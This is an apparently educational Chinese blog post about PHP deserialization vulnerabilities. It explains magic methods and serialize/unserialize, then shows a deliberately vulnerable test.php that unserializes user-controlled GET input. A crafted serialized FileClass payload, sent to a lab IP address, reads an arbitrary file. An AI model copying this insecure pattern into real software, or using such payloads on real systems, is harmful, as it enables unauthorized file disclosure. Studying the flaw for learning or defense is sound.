关于反序列化漏洞的一些理解

最新推荐文章于 2024-05-06 16:51:02 发布
最新推荐文章于 2024-05-06 16:51:02 发布
阅读量9.4k 收藏 13
点赞数
分类专栏: ctf web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40996739/article/details/82724602
版权
web 同时被 2 个专栏收录
42 篇文章 2 订阅
订阅专栏
ctf
7 篇文章 0 订阅
订阅专栏

  php类可能会包含一些特殊的函数叫magic函数,magic函数命名是以符号__开头的,比如 __construct, __destruct, __toString, __sleep, __wakeup等等。这些函数在某些情况下会自动调用,比如__construct当一个对象创建时被调用,__destruct当一个对象销毁时被调用,__toString当一个对象被当作一个字符串使用。为了更好的理解magic方法是如何工作的,在2.php中增加了三个magic方法,__construct, __destruct和__toString。可以看出,__construct在对象创建时调用,__destruct在php脚本结束时调用,__toString在对象被当作一个字符串使用时调用。这些魔术函数有点类似c++里的构造函数和析构函数。而反序列化漏洞正是利用魔术函数执行脚本。

  序列化函数serialize()执行的操作是保存一个类,至于为什么要保存,可以举一个简单的例子来看一下,比如php中一个脚本b需要调用上一个脚本a的数据,而脚本b需循环多次,因为脚本a执行完后其本身的数据就会被销毁,总不可能b每次循环时都执行一遍脚本a吧,serialize()就是用来保存类的数据的,而unserialize()则是将保存的类的数据转换为一个类。

  知道了这些后就可以看反序列化漏洞是如何利用魔术函数的了,先来看一个例子,以下php代码保存为test.php

<?php

class FileClass

{

public $filename = 'error.log';

// 当对象被作为一个字符串会读取这个文件

public function __toString()

{

return file_get_contents($this->filename);

}

} 

class User  
{  
    // Class data  
   
    public $age = 0;  
    public $name = '';  
   
    // 允许对象作为一个字符串输出上面的data  
   
    public function __toString()  
    {  
        return 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';  
    }  
}  
   
// 用户可控  
   
$obj = unserialize($_GET['usr_serialized']);  
   
// 输出__toString  
   
echo $obj;  
   

?>

  然后创建1.txt

然后创造利用函数1.php

<?php  
 
include 'test.php';  
$fileobj = new FileClass();  
$fileobj->filename = '1.txt';  
   
echo serialize($fileobj);  
   
?>

new fileclass这个类时会调用_tostring()这个魔术函数,通过指定filename为1.txt

访问http://192.168.153.138/test.php?usr_serialized=O:9:"FileClass":1:{s:8:"filename";s:5:"1.txt";}

成功显示了1.txt的内容。利用成功。

 

 

才不是小弱鸡
关注
  • 0
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
反序列化漏洞详解
目标检测专栏持续更新中,改进YOLO系列通用,适用v5、v7、v8、所有博客均是团队原创博客,所有文章禁止转载,违者必究。
07-31 524
序列化是将对象转换为字符串以便存储传输的一种方式。而反序列化恰好就是序列化的逆过程,反序列化会将字符串转换为对象供程序使用。在PHP中序列化和反序列化对应的函数分别为serialize()和unserialize()。当程序在进行反序列化时,会自动调用一些函数,例如__wakeup(),__destruct()等函数,但是如果传入函数的参数可以被用户控制的话,用户可以输入一些恶意代码到函数中,从而导致反序列化漏洞。魔术方法是PHP面向对象中特有的特性。...
反序列化漏洞
weixin_46447549的博客
11-12 2612
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录一、什么是反序列化漏洞?1.序列化与反序列化2.反序列化漏洞二、PHP反序列化漏洞1.php中必须出现反序列化的原因2.序列化和反序列化函数3.php反序列化漏洞示例(PHP对象注入漏洞)4.PHP反序列化漏洞分析5.补充二、Java反序列化漏洞1.引发2.原因3.根源学习资料三、反序列化漏洞的防御? 一、什么是反序列化漏洞? 1.序列化与反序列化 序列化即将对象转化为字节流,便于保存在文件,内存,数据库中;反序列化即将字节流转
2024年最新网络安全-反序列化漏洞简介、攻击与防御(1),小码农也有大梦想
最新发布
2401_84265571的博客
05-06 852
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
反序列化漏洞原理从零学起-小白都能懂反序列化漏洞
silencediors的博客
11-06 1020
前言 鼓起很大的勇气写这篇博文,不想承认我一直以来对反序列化漏洞就是一知半解的事实。其实我一直对反序列化漏洞有个执念,就是在我java这门语言完全不懂的时候我就非要去研究java的各种反序列化,然后把自己逼到一个绝路,大概这个持续时间有一两个月,还是一头雾水。后来我慢慢读代码,不懂的百度,也跟进学习,直到我有一天接触到php反序列化,哦,原来反序列化是这样。记得当时java里面的各种rmi,反射链...
反序列化漏洞汇总
buffedon的博客
07-15 3992
JAVA反序列化、PHP反序列化,场景容器反序列化利用过程
反序列化(Unserialize)漏洞详解
热门推荐
qq_49422880的博客
09-28 1万+
序列化和反序列化漏洞分析   序列化(serialize) 就将对象的状态信息转换为可以存储或传输的形式的过程 在序列化期间,对象将当前的状态写入到临时或持久性的存储区 【将状态信息保存为字符串】。   反序列化(unserialize) 就是把序列化之后的字符串在转化为对象。 其实在序列化的过程中是没有任何的漏洞的,产生漏洞的主要的原因就是在反序列化的过程中,通过我们的恶意篡改会产生魔法函数绕过,字符逃逸,远程命令执行等漏洞,最早发现这些漏洞的大佬是真的牛。 一、简单的魔法函数 魔法函数 调用
PHP反序列化漏洞.pdf
08-10
总的来说,PHP反序列化漏洞是一个复杂且危险的安全问题,开发者需要对对象的序列化和反序列化过程有深入理解,并采取合适的防护措施,以防止此类漏洞被攻击者利用。在编写和维护PHP代码时,应始终遵循最佳实践,进行...
JAVA及Jackson反序列化漏洞.docx
07-27
以CVE-2020-10673为例,这是一个针对Jackson库的反序列化漏洞,它影响了Jackson 2.9.2版本。复现该漏洞通常涉及构造特定的JSON输入,利用Jackson反序列化时的弱点,触发恶意行为。在复现过程中,需要设置合适的环境...
Fastjson反序列化漏洞史1
08-03
在2020年5月8日的分析中,文章提到了Fastjson反序列化漏洞的历史,并对一些关键的更新和漏洞时间线进行了梳理。由于Fastjson并未在CVE(Candidate Vulnerabilities Enumeration)数据库中注册,因此查找历史漏洞事件...
技术专栏 _ 深入理解JNDI注入与Java反序列化漏洞利用.pdf
09-18
技术专栏 _ 深入理解JNDI注入与Java反序列化漏洞利用 企业安全 工控安全 安全对抗 安全建设 企业安全
Java反序列化漏洞自动挖掘方法.pdf
08-21
Java反序列化漏洞是软件安全领域中的一个重要话题,尤其在AI信息安全研究和可信编译安全架构中,它关乎系统的安全性和稳定性。反序列化是将从磁盘或网络中读取的序列化数据转换回内存中的对象的过程。在Java中,这一...
反序列化漏洞原理、成因、危害、攻击、防护、修复方法
白帽子凯哥聊黑客
12-23 4534
首先,我们定义一个简单的Java类,该类具有可序列化的属性。// 标准的getter和setter方法 public String getUsername() {} }// 标准的getter和setter方法 public String getUsername() {} }// 标准的getter和setter方法。
PortSwigger 基于不安全的反序列化漏洞
weixin_42451330的博客
06-01 624
反序列化漏洞是指攻击者通过在应用程序中注入恶意的序列化对象来利用应用程序的反序列化功能,从而导致应用程序受到攻击的漏洞。在一些编程语言和应用程序中,对象可以被序列化为一些字节流或字符串,然后在不同的应用程序之间传输。当这些对象被接收时,它们需要进行反序列化以恢复原始对象。攻击者可以利用这种反序列化过程来注入恶意的代码和数据,从而导致应用程序执行恶意操作,例如远程命令执行、文件读写、数据库操作等。
不安全的反序列化_小猿圈浅析web安全之序列化与反序列化漏洞
weixin_39588252的博客
12-11 147
对于现在的互联网产品你了解多少?有没有想过自己有一天会被黑客攻击,自己的人身财产得不到保障,不过现在web安全推出以后得到了改善,今天小猿圈web安全老师就为大家分享web安全的一个知识点,希望对于你的学习有所帮助,web安全之序列化与反序列化漏洞。1.序列化简介将原本的数据通过某种手段进行“压缩”,并且按照一定的格式存储的过程就可以称之为序列化。如:通常情况下为了前后端之间的传输方便我们将其js...
(渗透学习)PHP 反序列化漏洞---魔术方法使用不当引发的后果
yang1234567898的博客
12-26 680
序列化:serialize() 反序列化:unserialize() 序列化对象: <?php class whatDo { var $x = "imz"; var $y = 10; } $obj = new whatDo(); echo serialize($obj); ?> 输出:O:6:"whatDo":2:{s:1:"x";s:3:"imz";s:1:"y";i:10;} 反序列化漏洞成因: 在PHP中,当对象在被使用时,会自动触发魔术方法,如: ..
不安全的反序列化_PHP编码安全:避免反序列化漏洞
weixin_39962341的博客
12-11 158
一次性付费进群,长期免费索取教程,没有付费教程。进微信群回复公众号:微信群;QQ群:460500587教程列表见微信公众号底部菜单 |本文底部有推荐书籍微信公众号:计算机与网络安全ID:Computer-network反序列化漏洞也称为对象注入漏洞,即恶意攻击者利用PHP的对象序列化和反序列化进行攻击,将恶意数据注入PHP的代码中进行执行的漏洞。在PHP中使用serialize...
A08.软件和数据完整性故障-[不安全的反序列化]-[PHP反序列化漏洞]最简概述
qwsn
12-24 2293
PHP反序列化漏洞理解这个漏洞前,你需要先搞清楚php中serialize(),unserialize()这两个函数。 1、序列化serialize() 序列化:序列化说通俗点就是把一个对象变成可以传输的字符串 比如下面是一个对象: class S{ public $test="pikachu"; } $s=new S(); //创建一个对象 serialize($s); //把这个对象进行序列化 序列化后得到的结果是这个样子的:O:1:"S"
php反序列化漏洞习题
09-06
关于PHP反序列化漏洞的习题,可以使用GlobIterator类和ArrayObject类来进行练习。其中,GlobIterator类的题目是被遗忘的反序列化,ArrayObject类的题目是easy_php。 PHP反序列化漏洞是一种安全漏洞,其中一个具体的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值